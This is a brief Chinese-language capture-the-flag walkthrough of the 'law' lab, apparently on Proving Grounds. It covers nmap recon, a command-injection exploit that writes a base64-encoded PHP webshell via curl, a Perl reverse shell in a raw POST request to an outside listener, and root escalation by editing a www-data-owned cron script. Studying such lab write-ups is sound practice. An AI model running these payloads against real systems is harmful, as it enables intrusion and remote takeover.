law Intermediate walkthrough pg

靶场很简单分数只有10分跟平常做的20分的中级靶场比确实简单
我拿来放松的
算下来30分钟解决战斗

nmap 扫到80端口web界面

是个框架

搜exp https://www.exploit-db.com/exploits/52023

他的脚本可能有点问题看不到回显
我们审脚本直接看到漏洞点所在 命令执行
curl -s -d "sid=foo&hhook=exec&text=echo 'PD9waHAgc3lzdGVtKCRfUE9TVFthXSk7cGhwaW5mbygpOyA/Pg==' | base64 -d > shell.php" -b "sid=foo" http://192.168.167.190/ 这是我改写的exp 写入shelll.php 的webshell

反弹shell阶段

POST /shell.php HTTP/1.1Host: 192.168.167.190User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 159Origin: http://192.168.167.190Connection: closeReferer: http://192.168.167.190/shell.phpCookie: sid=9ush9i4fpdsee6uc8rtfue4pkrUpgrade-Insecure-Requests: 1a=perl%20-MIO%20-e%20'$p=fork;exit,if($p);$c=new%20IO::Socket::INET(PeerAddr,%22192.168.45.250:80%22);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_%20while<>;'

获取完整tty以后

wget 我们kali上的pspy64 运行 发现有定时任务 执行者是root

又发现该文件所有者是www-data

直接在里面加恶意代码getrootshell

提权成功